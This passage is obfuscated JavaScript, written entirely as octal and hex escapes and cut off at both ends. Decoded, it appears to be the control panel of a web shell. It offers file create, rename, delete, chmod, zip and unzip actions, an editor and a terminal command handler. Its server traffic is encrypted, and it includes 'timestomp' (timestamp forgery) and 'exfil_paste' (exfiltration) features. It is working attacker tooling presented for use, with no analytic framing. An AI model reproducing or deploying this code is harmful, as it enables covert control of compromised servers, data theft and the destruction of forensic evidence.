\144\x61\x74\141\163\145\x74\x2e\x70\145\162\155\x73\51\54\xa\40\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\40\x20\x7a\x69\160\x3a\40\x28\x29\x20\x3d\76\40\164\x68\x69\163\x2e\x7a\x69\x70\111\x74\145\155\50\x70\x61\x74\150\51\x2c\12\40\40\x20\x20\40\x20\40\x20\x20\40\40\x20\40\40\40\40\40\40\40\x20\165\156\172\151\x70\x3a\x20\50\51\40\x3d\76\x20\x74\150\151\x73\x2e\x75\x6e\x7a\x69\x70\x49\164\x65\155\50\160\x61\164\150\51\x2c\12\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\40\x20\x20\40\40\x20\x74\x69\155\x65\x73\164\x6f\155\160\x3a\x20\50\51\x20\x3d\76\x20\164\150\151\x73\x2e\x73\150\x6f\x77\124\151\x6d\145\163\164\157\155\x70\x4d\x6f\x64\141\154\x28\x70\x61\x74\150\x29\x2c\xa\40\x20\x20\40\40\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\40\x20\145\170\146\151\154\137\160\x61\x73\x74\x65\72\40\50\x29\40\75\x3e\x20\164\x68\151\163\x2e\x65\170\x66\151\154\126\x69\x61\x50\x61\x73\x74\x65\50\x70\141\164\150\51\12\x20\40\x20\40\x20\40\40\40\40\40\x20\x20\x20\x20\40\40\175\x3b\12\x20\x20\x20\x20\40\40\x20\40\40\40\x20\40\40\x20\40\x20\151\146\x20\50\141\143\164\151\x6f\x6e\x73\x5b\x61\x63\164\x69\157\x6e\135\51\40\x61\143\x74\151\x6f\156\x73\133\x61\x63\x74\151\x6f\156\x5d\50\x29\73\12\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\x7d\12\x20\x9\11\11\145\x6c\x73\145\40\x69\x66\x20\x28\145\x2e\164\141\162\x67\x65\164\x2e\143\154\x6f\x73\145\163\164\50\47\164\144\x2e\146\156\141\155\145\47\51\51\40\173\12\40\11\x9\11\11\x69\x66\40\50\162\x6f\x77\56\x64\x61\x74\141\163\145\164\56\x64\151\162\40\75\75\x3d\40\47\x74\162\x75\145\x27\51\40\164\x68\151\x73\56\x6c\x6f\141\144\106\151\x6c\x65\163\50\x70\141\164\x68\51\73\12\x20\11\11\11\11\x65\154\x73\145\x20\x7b\40\x63\x6f\x6e\163\x74\x20\145\170\x74\x20\75\x20\x6e\141\155\x65\56\163\160\154\x69\x74\50\47\56\x27\x29\56\160\x6f\160\x28\x29\56\x74\157\114\157\x77\x65\162\x43\x61\163\145\50\x29\x3b\40\x69\x66\40\x28\133\47\152\x70\x67\x27\54\x20\x27\x6a\160\x65\x67\47\x2c\40\47\160\x6e\147\47\x2c\40\47\147\151\x66\47\54\40\x27\x77\x65\142\x70\47\54\x20\x27\x73\x76\x67\x27\x2c\x20\x27\155\160\x34\47\54\40\47\x77\145\x62\155\47\x2c\x20\47\157\147\147\47\x5d\56\x69\x6e\x63\x6c\165\x64\145\163\x28\x65\x78\164\51\51\x20\173\x20\164\x68\151\x73\x2e\163\150\x6f\x77\115\x65\x64\x69\x61\x4d\157\x64\x61\154\x28\160\141\x74\150\x2c\x20\x65\170\164\51\73\40\175\40\145\154\x73\x65\x20\173\40\x74\150\x69\x73\x2e\163\150\157\167\105\144\151\164\157\x72\50\x70\141\x74\150\x29\x3b\x20\175\40\175\12\x20\11\11\x9\x7d\12\x20\11\x9\x7d\x2c\xa\11\x9\141\x73\x79\156\143\x20\x63\162\x65\141\x74\145\111\x74\145\155\x28\x74\171\x70\145\51\40\x7b\x20\x63\157\156\x73\x74\40\x6e\x61\x6d\145\x20\75\x20\141\x77\141\x69\x74\x20\x74\150\151\x73\56\x73\150\157\167\111\156\x70\x75\164\115\x6f\144\x61\154\x28\140\x45\x6e\x74\145\162\x20\x6e\145\x77\40\44\173\x74\171\x70\x65\x7d\x20\156\x61\155\x65\72\140\x2c\x20\x27\47\x2c\40\173\40\164\x69\x74\154\145\72\40\140\360\237\x93\201\x20\x43\162\x65\141\164\x65\x20\x4e\x65\167\x20\x24\x7b\164\171\x70\x65\40\75\75\x3d\x20\x27\x66\x69\154\x65\x27\x20\x3f\x20\47\106\x69\x6c\x65\x27\x20\72\x20\47\x44\x69\x72\x65\143\x74\157\162\x79\47\175\x60\54\40\x69\x63\157\x6e\x3a\40\164\171\x70\145\40\x3d\75\75\x20\47\x66\151\154\x65\x27\40\x3f\40\x27\xf0\237\223\x84\x27\40\x3a\40\x27\360\237\223\x81\47\54\x20\162\145\x71\165\151\162\x65\x64\72\40\164\x72\165\x65\54\40\160\154\141\x63\145\x68\157\154\144\145\162\72\40\140\105\x6e\x74\145\x72\x20\44\x7b\x74\171\160\x65\x7d\40\156\x61\155\145\56\56\x2e\x60\40\175\51\73\40\x69\x66\40\x28\156\x61\155\x65\51\40\x7b\x20\143\x6f\x6e\163\164\x20\x72\x65\163\x20\75\40\141\167\141\x69\x74\x20\x74\x68\151\163\x2e\x61\160\151\x28\x27\143\162\145\x61\x74\x65\x27\x2c\x20\x7b\40\x6e\141\155\145\54\x20\164\171\x70\x65\x20\x7d\x29\x3b\x20\x69\x66\x20\x28\x72\145\x73\56\x73\x74\141\164\165\x73\40\75\75\x3d\x20\x27\x73\x75\x63\143\145\x73\x73\x27\51\40\x7b\40\164\x68\x69\x73\x2e\x74\x6f\141\163\x74\50\162\145\163\56\x6d\x65\163\x73\x61\x67\x65\51\x3b\x20\x74\150\x69\x73\56\x6c\157\141\144\106\x69\154\145\x73\50\x74\x68\151\x73\56\x63\167\144\x29\73\x20\175\x20\x7d\x20\x7d\x2c\12\11\11\x61\x73\x79\x6e\143\40\x72\145\156\141\155\145\x49\164\x65\155\x28\x70\141\164\x68\x2c\x20\x6f\154\144\x4e\x61\155\145\x29\x20\173\40\x63\157\x6e\163\x74\x20\156\145\x77\116\x61\x6d\x65\x20\x3d\40\x61\167\x61\x69\x74\x20\164\x68\x69\x73\56\163\150\157\x77\x49\156\x70\165\x74\115\157\144\141\154\x28\42\x45\x6e\x74\x65\162\x20\x6e\145\167\40\156\x61\155\x65\72\x22\54\40\157\154\144\x4e\x61\x6d\x65\54\40\x7b\40\x74\x69\164\154\145\72\x20\47\342\x9c\x8f\xef\xb8\217\x20\x52\145\x6e\x61\155\x65\40\111\164\x65\155\47\x2c\x20\151\143\x6f\156\72\40\x27\342\x9c\x8f\xef\270\217\x27\54\x20\162\x65\x71\x75\x69\x72\145\144\x3a\40\x74\162\x75\x65\54\40\x70\154\141\x63\145\150\x6f\154\144\145\162\x3a\x20\47\x45\x6e\x74\145\162\40\x6e\145\x77\x20\156\141\x6d\x65\56\56\x2e\x27\54\40\x76\141\154\x69\144\x61\x74\x6f\162\x3a\x20\x28\166\x61\x6c\51\x20\x3d\76\x20\x76\x61\x6c\x20\x21\75\x3d\40\x6f\x6c\x64\x4e\x61\155\x65\x2c\x20\x76\141\154\151\x64\141\x74\x6f\162\105\162\x72\x6f\x72\72\x20\47\x4e\145\x77\40\156\x61\x6d\x65\40\x6d\x75\163\164\40\x62\145\x20\x64\x69\x66\x66\145\162\x65\x6e\x74\x20\146\x72\157\155\40\x63\165\162\x72\145\156\x74\x20\x6e\x61\x6d\x65\x27\40\x7d\x29\73\x20\151\146\40\50\x6e\x65\167\116\141\x6d\145\40\x26\x26\x20\x6e\145\x77\x4e\141\x6d\x65\x20\41\75\x3d\x20\x6f\x6c\x64\x4e\141\x6d\x65\x29\40\x7b\40\x63\157\156\163\x74\x20\x72\x65\x73\40\75\x20\141\x77\x61\x69\164\x20\164\150\151\x73\x2e\x61\x70\x69\x28\x27\162\x65\156\141\155\145\47\x2c\40\x7b\40\160\x61\164\x68\54\x20\156\x65\167\x4e\141\155\x65\x20\175\x29\x3b\x20\x69\x66\x20\x28\x72\145\x73\56\163\x74\141\164\165\x73\x20\x3d\75\x3d\x20\x27\x73\165\x63\x63\x65\x73\163\x27\51\x20\x7b\x20\x74\150\x69\163\x2e\x74\157\x61\x73\164\x28\162\x65\163\x2e\x6d\x65\163\163\x61\147\x65\x29\73\40\164\150\151\x73\x2e\x6c\x6f\x61\x64\106\151\x6c\x65\x73\50\164\150\x69\x73\56\143\x77\144\51\x3b\40\175\x20\175\x20\x7d\x2c\xa\40\11\x9\141\x73\x79\x6e\x63\x20\144\x65\154\x65\164\145\x49\x74\x65\x6d\50\x70\x61\164\x68\54\40\x6e\x61\x6d\145\51\x20\x7b\x20\x63\x6f\156\163\x74\x20\143\157\156\146\151\x72\155\x65\x64\x20\75\x20\141\x77\x61\x69\x74\x20\x74\x68\x69\x73\x2e\163\150\157\x77\x43\157\156\x66\151\162\x6d\115\x6f\144\x61\x6c\x28\140\x41\x72\145\40\171\157\x75\x20\x73\165\162\145\x20\x79\157\165\40\167\x61\x6e\164\x20\x74\x6f\x20\144\x65\154\x65\164\x65\x20\x3c\163\164\x72\x6f\x6e\147\x3e\42\x24\x7b\156\141\155\x65\175\42\x3c\x2f\x73\x74\x72\157\x6e\x67\x3e\x3f\x60\x2c\40\x7b\40\164\x79\160\145\x3a\40\47\144\141\x6e\147\x65\162\47\54\x20\x6f\153\124\145\x78\x74\72\40\x27\x44\x65\x6c\x65\164\x65\x27\54\x20\x63\141\156\143\145\154\124\x65\170\164\x3a\x20\x27\103\x61\156\143\145\x6c\47\40\x7d\51\x3b\x20\151\146\x20\50\143\157\156\146\x69\x72\155\145\x64\x29\x20\173\x20\143\157\x6e\163\x74\40\x72\145\163\x20\75\x20\141\x77\141\151\164\x20\164\150\x69\163\x2e\141\160\x69\x28\47\144\145\x6c\145\x74\145\x27\x2c\x20\x7b\40\160\x61\164\x68\x20\x7d\x29\73\x20\151\x66\40\50\x72\145\x73\56\163\164\141\x74\x75\x73\x20\x3d\x3d\x3d\40\x27\163\165\x63\143\x65\163\x73\47\51\x20\173\40\164\x68\151\x73\56\x74\x6f\x61\163\164\x28\x72\x65\x73\56\x6d\x65\163\x73\141\147\145\51\73\40\x74\150\151\x73\x2e\x6c\157\x61\144\x46\151\154\x65\x73\50\x74\x68\151\163\56\143\x77\x64\51\73\x20\x7d\40\x7d\x20\175\54\12\40\x9\11\x61\163\x79\156\143\x20\172\x69\x70\x49\x74\145\155\50\160\141\x74\150\x29\x20\173\x20\143\157\156\163\x74\x20\143\157\x6e\146\151\162\155\x65\x64\x20\75\40\x61\167\141\151\x74\40\x74\150\x69\x73\56\x73\150\157\x77\103\157\156\146\x69\x72\155\115\x6f\x64\141\154\50\x60\x43\x72\145\x61\164\x65\x20\x61\x20\172\x69\160\40\x61\162\143\150\151\x76\x65\40\157\146\40\74\163\x74\162\x6f\x6e\x67\76\42\x24\173\x70\x61\164\x68\x2e\x73\x70\x6c\x69\x74\x28\x27\x2f\47\51\x2e\x70\x6f\x70\x28\51\x7d\42\x3c\x2f\x73\x74\162\157\156\x67\76\77\140\54\x20\x7b\40\x74\171\x70\x65\72\40\47\x71\x75\145\x73\164\x69\157\x6e\x27\40\175\51\73\x20\151\146\40\x28\143\x6f\156\x66\x69\x72\155\145\x64\51\x20\x7b\40\x63\157\156\163\x74\x20\162\x65\x73\x20\x3d\x20\x61\x77\141\151\x74\x20\x74\x68\x69\x73\56\141\160\x69\x28\x27\172\x69\160\x27\x2c\40\x7b\x20\160\141\164\150\40\x7d\51\x3b\x20\x69\x66\x20\50\x72\145\x73\56\163\x74\x61\164\x75\163\x20\x3d\75\x3d\40\x27\x73\x75\x63\x63\145\x73\163\47\x29\x20\x7b\x20\164\x68\x69\x73\56\x74\157\141\163\x74\50\x72\x65\x73\56\x6d\x65\163\x73\141\147\x65\51\73\40\x74\x68\151\163\56\154\x6f\x61\144\x46\151\154\145\x73\x28\x74\150\x69\x73\x2e\x63\x77\x64\x29\73\40\x7d\x20\175\x20\175\x2c\12\40\x9\x9\x61\163\x79\156\143\40\165\x6e\172\151\x70\x49\x74\x65\x6d\50\x70\141\x74\150\51\x20\x7b\x20\143\157\156\x73\164\40\143\x6f\x6e\146\x69\162\155\145\x64\x20\75\40\141\167\141\151\164\x20\x74\x68\151\163\x2e\x73\150\157\x77\x43\x6f\x6e\x66\x69\162\x6d\x4d\x6f\144\x61\x6c\50\x60\x45\170\164\162\x61\143\164\40\74\163\164\162\157\x6e\147\76\42\x24\x7b\x70\141\164\x68\56\163\160\x6c\x69\164\50\x27\x2f\x27\x29\56\x70\157\160\x28\x29\175\42\74\57\x73\164\x72\157\156\x67\x3e\77\x60\54\40\173\40\164\171\x70\145\72\x20\47\161\165\145\x73\x74\151\x6f\156\x27\40\x7d\51\73\x20\x69\x66\40\50\x63\x6f\156\146\x69\x72\155\145\144\x29\40\x7b\40\x63\157\x6e\x73\x74\x20\x72\x65\163\40\75\40\141\167\141\151\164\40\164\x68\151\x73\x2e\x61\x70\x69\50\47\x75\x6e\x7a\x69\x70\x27\x2c\40\173\40\x70\x61\x74\x68\40\x7d\x29\x3b\40\x69\x66\x20\x28\162\145\x73\56\x73\164\141\x74\165\x73\x20\75\x3d\x3d\40\47\163\x75\x63\x63\145\x73\163\x27\x29\40\x7b\40\x74\x68\151\x73\56\164\x6f\x61\163\x74\x28\162\x65\163\x2e\155\145\163\163\x61\147\x65\51\73\40\x74\150\151\163\x2e\x6c\x6f\141\x64\x46\x69\x6c\x65\x73\50\164\150\x69\x73\56\x63\167\144\x29\x3b\40\175\x20\175\x20\175\54\12\x20\11\x9\x61\x73\x79\156\x63\x20\x75\x70\154\x6f\141\x64\106\x69\154\145\x73\50\145\x29\40\173\12\40\11\x9\11\x63\x6f\156\x73\x74\40\146\151\154\145\x73\40\75\40\x41\x72\x72\141\x79\56\146\162\x6f\x6d\x28\x65\56\x74\x61\162\x67\145\164\56\x66\151\154\x65\x73\51\x3b\40\151\146\x20\x28\x21\x66\151\154\x65\x73\56\154\x65\x6e\147\x74\150\x29\40\162\145\x74\x75\162\x6e\73\x20\x74\150\x69\x73\x2e\x74\157\141\x73\164\x28\x60\125\x70\154\x6f\x61\144\151\156\x67\40\x24\x7b\x66\x69\x6c\145\x73\x2e\x6c\x65\x6e\x67\x74\150\175\40\146\151\x6c\145\50\163\51\56\56\x2e\x60\51\73\12\40\x9\11\x9\143\157\x6e\x73\x74\40\x66\157\x72\155\x44\141\x74\141\40\75\x20\x6e\x65\x77\40\x46\157\x72\155\104\x61\x74\141\50\x29\73\xa\x20\11\11\x9\143\157\x6e\x73\x74\x20\x70\x61\x79\x6c\157\141\144\x20\x3d\x20\173\x20\141\x63\164\x69\x6f\x6e\x3a\40\x27\x75\160\154\x6f\141\144\x27\x2c\40\160\x61\x74\150\x3a\x20\164\150\x69\x73\x2e\143\167\x64\x20\x7d\x3b\xa\40\11\11\x9\x66\x6f\x72\155\x44\141\x74\x61\x2e\x61\160\x70\x65\156\x64\x28\47\x70\47\x2c\x20\164\150\x69\x73\56\145\156\143\x72\x79\x70\164\x28\x4a\123\x4f\116\x2e\x73\x74\x72\151\156\x67\151\146\x79\x28\x70\141\171\x6c\157\x61\144\51\51\x29\x3b\12\40\11\11\x9\x66\x69\154\145\163\x2e\146\x6f\x72\x45\x61\143\150\50\146\151\x6c\145\40\75\76\x20\146\157\x72\x6d\104\x61\164\x61\x2e\141\x70\x70\x65\156\x64\x28\47\146\151\x6c\145\133\135\47\x2c\x20\x66\x69\x6c\145\x29\x29\73\xa\x20\11\11\11\164\x72\x79\x20\173\xa\x20\11\x9\x9\11\x63\157\x6e\x73\164\40\162\x65\x73\40\75\40\141\167\141\151\x74\40\146\x65\164\x63\x68\50\123\103\x52\111\120\124\137\125\x52\x4c\54\x20\173\x20\x6d\x65\x74\150\157\x64\x3a\x20\x27\120\117\x53\124\47\x2c\40\x62\x6f\x64\171\x3a\40\146\x6f\x72\155\104\x61\x74\141\40\x7d\x29\x3b\40\x63\157\156\163\164\40\145\156\143\x6f\x64\x65\144\x52\x65\x73\160\157\156\x73\x65\x20\75\40\x61\167\x61\x69\x74\x20\x72\x65\x73\x2e\x74\x65\x78\164\50\51\x3b\40\x63\157\x6e\x73\x74\40\152\163\157\156\x20\75\x20\x4a\x53\117\116\56\160\x61\162\x73\x65\x28\x74\150\151\163\56\x64\145\x63\x72\171\x70\164\x28\x65\156\143\157\x64\x65\x64\122\x65\163\x70\157\156\x73\145\51\x29\73\xa\x20\11\x9\11\x9\x74\150\151\163\56\164\x6f\x61\x73\x74\x28\x6a\x73\157\156\x2e\155\x65\x73\163\x61\147\x65\x2c\x20\x6a\163\157\156\x2e\x73\x74\x61\164\x75\163\51\x3b\40\164\x68\x69\163\x2e\x6c\x6f\x61\144\106\151\x6c\x65\163\x28\x74\x68\x69\163\x2e\x63\167\144\x29\x3b\xa\x20\x9\11\x9\x7d\40\x63\141\164\143\150\x20\x28\145\162\x72\x29\x20\173\x20\x74\150\x69\163\x2e\x74\157\x61\163\x74\x28\x27\x55\x70\154\157\x61\144\40\146\141\151\x6c\x65\x64\56\47\54\x20\47\x65\x72\x72\157\x72\x27\x29\73\40\175\x20\146\x69\x6e\141\154\154\x79\40\173\40\145\56\164\141\x72\147\145\x74\x2e\166\x61\x6c\x75\145\40\x3d\40\x27\x27\73\40\175\12\x20\x9\x9\x7d\54\xa\x20\11\x9\141\163\x79\156\x63\40\x73\x68\157\167\105\144\x69\164\x6f\162\50\x70\141\x74\x68\51\x20\173\12\40\11\x9\11\x63\157\156\163\x74\40\162\x65\x73\40\75\40\141\167\141\151\164\x20\164\150\x69\163\56\x61\160\x69\50\x27\147\x65\164\137\146\x69\x6c\x65\137\x63\x6f\156\x74\x65\x6e\164\x27\x2c\x20\x7b\x20\x70\x61\x74\150\40\175\51\x3b\x20\x69\146\40\50\x72\x65\163\56\163\x74\141\x74\x75\x73\x20\41\75\75\x20\47\163\x75\143\x63\x65\x73\x73\x27\x29\x20\x72\145\x74\165\x72\156\73\12\x20\x9\11\x9\164\150\x69\x73\56\163\150\157\x77\x4d\x6f\144\x61\x6c\x28\144\157\143\165\155\145\156\164\x2e\x67\145\164\105\154\x65\155\x65\156\x74\102\x79\111\144\x28\47\x65\x64\x69\164\157\162\x2d\155\157\x64\141\x6c\47\x29\51\x3b\40\x64\x6f\x63\x75\155\145\156\x74\56\147\145\x74\x45\154\145\x6d\x65\x6e\164\x42\x79\111\x64\x28\x27\145\x64\151\164\157\x72\x2d\x66\x69\x6c\145\156\x61\x6d\145\47\x29\x2e\151\156\156\145\x72\124\x65\x78\164\x20\x3d\40\160\141\x74\x68\x3b\12\x20\x9\x9\11\x69\146\x28\x21\164\150\x69\x73\56\145\x64\151\164\157\x72\51\x20\x7b\x20\x74\150\x69\163\x2e\145\144\151\164\157\162\x20\75\x20\x43\157\144\145\115\151\162\162\x6f\162\56\146\x72\x6f\155\124\x65\x78\x74\101\x72\x65\x61\50\144\x6f\x63\x75\155\x65\x6e\x74\x2e\147\145\164\x45\x6c\145\x6d\x65\156\164\x42\171\111\x64\50\x27\x65\144\151\x74\157\x72\x2d\164\x65\x78\x74\x61\162\145\141\47\x29\x2c\40\173\x20\x6c\x69\x6e\x65\x4e\x75\x6d\x62\145\162\x73\72\40\164\162\165\x65\x2c\x20\164\150\145\155\x65\x3a\x20\x27\144\x72\141\143\x75\x6c\x61\47\54\x20\x6d\x61\x74\143\x68\x42\162\x61\x63\x6b\x65\x74\163\x3a\40\x74\x72\165\145\x20\x7d\x29\x3b\40\x7d\xa\x20\x9\11\11\164\150\151\x73\x2e\145\144\151\164\x6f\162\x2e\x73\145\164\x56\141\x6c\x75\x65\x28\162\145\x73\56\x63\x6f\x6e\x74\145\156\x74\51\73\40\143\x6f\x6e\x73\x74\x20\155\x6f\x64\x65\x49\156\146\x6f\x20\75\40\x43\x6f\x64\145\x4d\151\x72\162\157\x72\56\146\151\156\144\x4d\157\x64\x65\102\171\x46\x69\154\145\x4e\x61\x6d\x65\x28\160\x61\164\150\51\73\12\x20\11\x9\x9\x69\x66\40\50\155\157\x64\145\x49\156\146\157\51\x20\173\40\164\150\x69\163\x2e\x65\x64\151\164\x6f\162\x2e\163\x65\164\x4f\160\164\x69\x6f\x6e\50\x27\x6d\x6f\x64\x65\47\x2c\x20\x6d\x6f\x64\145\111\156\146\157\56\x6d\151\155\145\x29\x3b\40\x7d\x20\x65\x6c\163\145\40\x7b\x20\164\150\x69\163\x2e\x65\144\x69\164\x6f\x72\x2e\x73\x65\164\117\x70\164\151\157\x6e\50\x27\155\x6f\x64\x65\47\x2c\40\47\x74\x65\x78\164\x2f\160\154\x61\x69\156\x27\x29\x3b\40\x7d\12\40\11\x9\x9\163\145\x74\124\x69\155\145\x6f\165\x74\50\50\51\40\75\76\x20\164\150\151\163\56\145\144\x69\x74\x6f\162\56\x72\145\x66\162\145\x73\150\x28\51\54\x20\61\51\73\xa\40\11\11\x9\144\157\143\x75\155\x65\156\x74\56\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\102\x79\111\144\x28\x27\163\x61\166\145\55\x66\x69\x6c\145\x2d\x62\164\156\47\51\x2e\157\x6e\143\154\151\143\153\x20\x3d\x20\141\x73\171\x6e\143\40\x28\x29\x20\x3d\x3e\x20\173\x20\x63\157\x6e\163\x74\x20\x73\x61\166\x65\x52\145\x73\40\75\40\141\x77\141\151\164\40\164\150\151\x73\x2e\141\x70\151\50\x27\x73\x61\166\145\137\x66\x69\154\x65\x27\54\x20\173\40\x70\x61\164\150\x2c\x20\143\x6f\x6e\x74\145\156\164\72\x20\164\150\x69\x73\56\x65\144\151\164\x6f\162\56\147\145\164\126\141\x6c\x75\x65\50\x29\40\175\51\x3b\40\x69\146\50\163\x61\x76\145\122\145\x73\x2e\163\x74\141\x74\x75\x73\x20\75\x3d\x3d\40\47\x73\x75\143\x63\145\x73\x73\47\51\x20\173\40\x74\150\151\163\56\164\157\x61\163\x74\x28\x73\x61\166\x65\122\x65\x73\56\x6d\x65\163\163\x61\147\x65\51\73\40\164\x68\x69\163\x2e\x63\x6c\x6f\163\x65\115\x6f\x64\x61\154\50\144\157\143\x75\x6d\145\x6e\164\x2e\x67\x65\x74\x45\x6c\145\x6d\x65\156\x74\x42\171\x49\x64\50\47\145\144\151\x74\157\162\55\155\x6f\144\141\154\x27\51\x29\73\40\164\150\x69\x73\56\x6c\157\x61\144\106\151\154\x65\x73\x28\164\x68\x69\x73\x2e\x63\167\144\51\73\x20\x7d\x20\175\73\xa\40\x9\11\x7d\x2c\xa\40\x9\x9\163\150\157\167\x43\x68\155\x6f\144\115\157\x64\x61\154\x28\x70\141\x74\150\54\40\x63\165\x72\x72\x65\x6e\164\x50\x65\162\x6d\x73\51\40\x7b\12\40\x9\11\x9\x63\157\x6e\163\164\x20\155\157\144\141\x6c\x20\75\x20\144\x6f\x63\165\155\x65\x6e\x74\56\147\x65\x74\105\x6c\x65\x6d\x65\156\164\x42\x79\111\x64\x28\x27\x63\150\155\x6f\x64\x2d\x6d\157\144\x61\154\47\51\x3b\40\x74\150\x69\x73\x2e\163\x68\x6f\167\x4d\157\x64\141\x6c\50\x6d\x6f\144\x61\154\x29\73\40\x64\157\143\x75\155\x65\156\164\x2e\147\x65\x74\105\154\x65\155\x65\x6e\x74\102\x79\111\144\x28\x27\x63\150\155\157\x64\x2d\x70\141\x74\x68\47\51\56\x76\x61\x6c\165\x65\x20\75\x20\160\141\x74\x68\x2e\163\160\x6c\151\164\x28\x27\57\47\51\56\x70\157\x70\x28\x29\73\x20\x63\x6f\x6e\x73\164\40\151\x6e\x70\x75\164\x20\75\x20\144\157\143\x75\155\145\x6e\164\56\x67\x65\164\x45\154\x65\155\x65\156\164\x42\x79\111\144\x28\x27\x63\x68\x6d\x6f\x64\55\x69\156\x70\165\164\x27\51\73\xa\40\11\x9\11\151\x6e\160\x75\x74\56\x76\x61\154\165\145\40\75\x20\x63\x75\162\162\x65\156\x74\120\x65\x72\155\x73\73\x20\151\156\x70\165\164\x2e\146\x6f\143\x75\x73\50\x29\73\12\40\x9\x9\11\x64\157\x63\x75\x6d\145\x6e\164\56\147\145\x74\105\154\x65\155\145\x6e\164\x42\171\x49\144\x28\x27\x63\x68\155\157\x64\55\163\x61\x76\145\x2d\142\164\x6e\47\x29\x2e\157\156\x63\x6c\151\143\153\40\75\x20\x61\x73\171\156\x63\40\50\51\x20\x3d\76\40\173\x20\x63\x6f\156\163\x74\40\x70\x65\162\155\x73\x20\75\40\x69\156\x70\x75\x74\x2e\x76\141\154\x75\x65\x3b\40\151\x66\x28\x70\145\162\155\163\x20\46\46\x20\57\136\133\60\55\67\x5d\173\63\x2c\x34\175\x24\57\x2e\x74\145\163\x74\x28\x70\145\162\x6d\163\51\51\x20\173\x20\141\x77\141\x69\164\x20\164\x68\x69\163\x2e\x61\160\x69\x28\x27\143\150\155\x6f\x64\x27\x2c\x20\173\40\x70\x61\164\150\54\x20\x70\145\162\155\163\40\x7d\51\73\x20\x74\x68\151\163\x2e\143\154\x6f\x73\x65\115\x6f\144\141\154\x28\155\157\144\x61\154\51\73\x20\x74\x68\151\163\56\154\x6f\x61\x64\x46\x69\x6c\x65\163\50\164\x68\x69\163\56\x63\x77\144\x29\x3b\40\175\40\x65\154\x73\145\40\x7b\x20\x74\150\151\163\x2e\x74\157\x61\163\164\x28\47\111\156\x76\141\x6c\x69\x64\x20\x70\145\162\x6d\151\163\163\x69\157\x6e\x20\146\x6f\162\x6d\x61\164\56\47\54\x20\47\145\162\162\x6f\162\47\x29\73\x20\175\x20\175\73\12\40\x9\11\175\x2c\12\40\11\x9\x73\150\x6f\167\x4d\x65\144\x69\x61\x4d\x6f\x64\141\154\x28\160\141\164\x68\x2c\x20\145\x78\164\51\x20\x7b\12\40\x9\11\11\x63\x6f\156\163\x74\x20\x6d\157\x64\141\x6c\40\75\x20\144\x6f\x63\x75\155\x65\x6e\x74\56\147\145\x74\x45\x6c\145\x6d\145\x6e\164\x42\x79\x49\144\x28\47\155\x65\x64\x69\141\x2d\155\157\144\141\x6c\47\51\73\40\143\157\x6e\163\x74\x20\x63\x6f\x6e\164\x65\x6e\x74\40\75\40\x64\157\x63\x75\155\145\x6e\x74\56\147\x65\x74\105\154\145\155\x65\156\x74\102\x79\111\144\x28\47\155\x65\x64\151\141\55\x63\157\x6e\164\145\x6e\x74\x27\x29\73\40\164\x68\x69\x73\x2e\163\x68\x6f\x77\115\157\x64\141\154\x28\155\x6f\144\x61\154\51\73\x20\x63\x6f\156\163\164\x20\165\x72\154\40\75\40\140\x24\173\123\x43\122\x49\x50\124\x5f\125\122\114\x7d\77\x64\x6f\x77\156\x6c\157\x61\x64\75\44\173\145\156\x63\x6f\x64\x65\125\122\x49\103\157\x6d\x70\157\x6e\145\156\x74\x28\x70\141\x74\150\51\x7d\x60\73\xa\40\11\11\11\x69\146\x20\x28\133\47\152\x70\147\x27\x2c\40\x27\x6a\160\145\147\47\54\x20\47\160\x6e\147\47\54\40\47\147\x69\x66\x27\x2c\40\x27\x77\145\142\x70\47\x2c\40\47\163\166\x67\x27\135\x2e\x69\x6e\143\x6c\165\144\145\x73\50\145\170\164\x29\51\x20\173\x20\143\157\x6e\x74\145\x6e\x74\56\x69\x6e\156\145\x72\x48\124\115\114\40\75\x20\x60\74\151\x6d\x67\40\163\x72\x63\x3d\x22\x24\x7b\165\162\x6c\175\x22\x20\x73\x74\171\154\x65\x3d\x22\155\141\170\x2d\x77\x69\144\x74\150\72\x31\60\60\45\x3b\40\x6d\x61\170\x2d\x68\x65\151\147\x68\164\x3a\x20\67\x30\166\x68\x3b\40\x62\157\x72\x64\x65\x72\x2d\162\141\x64\151\x75\x73\x3a\x20\66\160\170\73\42\x3e\x60\x3b\40\x7d\x20\x65\154\163\x65\40\173\x20\x63\x6f\x6e\x74\x65\156\164\x2e\x69\156\x6e\x65\162\x48\124\x4d\114\x20\x3d\x20\140\x3c\166\151\x64\145\x6f\40\143\157\x6e\164\162\x6f\154\x73\x20\x61\165\x74\157\x70\154\x61\171\x20\x73\162\x63\75\42\x24\173\x75\x72\x6c\x7d\x22\x20\x73\x74\171\x6c\x65\x3d\x22\x6d\x61\170\x2d\x77\x69\x64\164\150\72\x31\x30\x30\x25\x3b\x20\155\x61\x78\x2d\150\x65\x69\x67\x68\x74\x3a\40\67\x30\x76\150\73\x20\142\x6f\x72\144\145\162\55\x72\x61\x64\x69\x75\163\72\x20\x36\x70\170\73\x22\76\74\x2f\x76\151\x64\x65\157\76\x60\x3b\40\x7d\12\40\x9\x9\x7d\54\xa\40\x9\11\x68\141\156\x64\x6c\x65\x54\x65\x72\x6d\x69\x6e\141\154\x49\156\160\x75\x74\50\x65\x29\x20\173\xa\40\11\x9\x9\x63\157\x6e\163\x74\40\151\156\160\165\164\40\x3d\x20\x65\56\164\x61\162\147\x65\164\73\12\x20\x9\x9\11\x63\157\156\163\164\40\x68\141\156\x64\154\145\103\x6d\x64\40\75\x20\x61\163\x79\156\x63\x20\50\51\x20\x3d\x3e\40\173\xa\40\11\x9\x9\x9\x63\157\x6e\163\x74\x20\143\155\x64\40\x3d\40\x69\156\x70\x75\164\x2e\x76\141\x6c\165\x65\x3b\x20\164\x68\x69\163\x2e\x68\151\x73\x74\x6f\x72\x79\56\x75\156\163\150\151\x66\164\x28\x63\x6d\x64\x29\73\x20\x74\x68\x69\163\56\x68\151\163\x74\157\162\x79\111\156\x64\145\170\40\75\40\55\61\73\12\40\11\x9\x9\x9\164\x68\x69\x73\x2e\141\x70\160\x65\x6e\x64\x54\x65\x72\155\151\156\141\x6c\x4f\x75\164\160\165\x74\x28\x60\74\163\x70\x61\x6e\40\163\164\171\154\x65\75\42\x63\157\x6c\157\162\x3a\166\141\162\50\55\x2d\x61\143\x63\x65\156\x74\55\147\162\x65\145\x6e\51\73\42\76\44\x7b\164\150\x69\163\x2e\x75\163\x65\x72\175\10